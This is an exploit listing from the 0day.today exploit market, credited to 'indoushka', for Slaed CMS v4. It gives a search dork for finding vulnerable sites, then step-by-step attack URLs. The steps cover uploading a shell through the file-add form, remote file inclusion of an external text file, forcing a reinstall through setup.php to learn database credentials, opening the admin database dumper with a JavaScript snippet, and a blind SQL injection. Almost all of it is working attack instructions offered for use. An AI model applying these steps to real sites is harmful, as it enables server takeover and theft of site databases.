[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Slaed CMS v4 Multiple Vulnerabilities

Author
indoushka
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11120
Category
web applications
Date add
27-02-2010
Platform
unsorted
=====================================
Slaed CMS v4 Multiple Vulnerabilities
=====================================

========================================================================================                 
| # Title    : Script Slaed Cms 4 Mullti Vulnerability  
| # Author   : indoushka   
| # Dork     : Powered by SLAED CMS © 2005-2008 SLAED. All rights reserved.
               Licensed to w-arab.com © 2010 Creative Studio. All rights reserved.                                                                                                             
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)      
| # Bug      : Mullti                                                                    
======================      Exploit By indoushka       =================================
# Exploit  : 
  
1 - Upload Shell:
 
first Register in to web site http://127.0.0.1/sd/index.php?name=files&op=add (use temper data)
 
secend go to http://127.0.0.1/sd/uploads/files/temp/  2 find you Ev!l
 
2 - RFI:
 
http://localhost/sd/index.php?file=http://localhost/c.txt?
 
http://localhost/sd/index.php?name=http://localhost/c.txt?
 
3 - Reinstall Script :
 
http://127.0.0.1/sd/setup.php?op=language&lang=1
 or
http://127.0.0.1/sd/install/index.php?op=language&lang=1
 
4 - Data Base Dumper :
 
First go to http://127.0.0.1/sd/admin.php?op=files&panel=1
 
put This code javascript:OpenWindow('modules/Dumper/index.php',%20'Dumper',%20'400',%20'350')
 
you know the user and pass from Reinstall script information to login to databass
 
5 - Blind SQL/XPath injection (I hate SQl *_*) :
 
http://127.0.0.1/sd/index.php?id=1



#  0day.today [2024-12-23]  #